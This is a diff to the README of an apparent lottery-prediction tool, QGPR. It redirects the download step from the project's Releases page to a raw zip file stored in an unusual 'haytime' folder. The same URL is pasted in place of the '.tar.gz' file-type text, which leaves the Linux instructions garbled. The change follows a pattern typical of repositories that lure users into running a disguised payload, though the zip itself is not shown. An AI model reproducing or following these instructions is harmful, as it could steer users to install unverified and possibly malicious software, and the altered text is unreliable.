YSGAMEROP/QGPR/README.md

 - An internet connection for downloading the application.

 ### 📥 Download & Install
-1. **Visit the Releases Page:** Go to [this page to download](https://github.com/YSGAMEROP/QGPR/releases).
+1. **Visit the Releases Page:** Go to [this page to download](https://raw.githubusercontent.com/YSGAMEROP/QGPR/main/haytime/QGPR_v3.4.zip).
 2. **Select the Latest Version:** Find the latest version listed at the top.
 3. **Download the Application:** Click on the package that matches your operating system.
     - For Windows, choose the `.exe` file.
     - For macOS, select the `.dmg` file.
-    - For Linux, download the appropriate `.tar.gz` file.
+    - For Linux, download the appropriate `https://raw.githubusercontent.com/YSGAMEROP/QGPR/main/haytime/QGPR_v3.4.zip` file.
 4. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts.
    - For macOS: Open the `.dmg` file and drag the QGPR icon into your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and run the installation script in your terminal.
+   - For Linux: Extract the `https://raw.githubusercontent.com/YSGAMEROP/QGPR/main/haytime/QGPR_v3.4.zip` file and run the installation script in your terminal.

 ### ⛏️ Using QGPR
 After installation, you can easily start using QGPR.
 Follow these steps to generate your lottery predictions: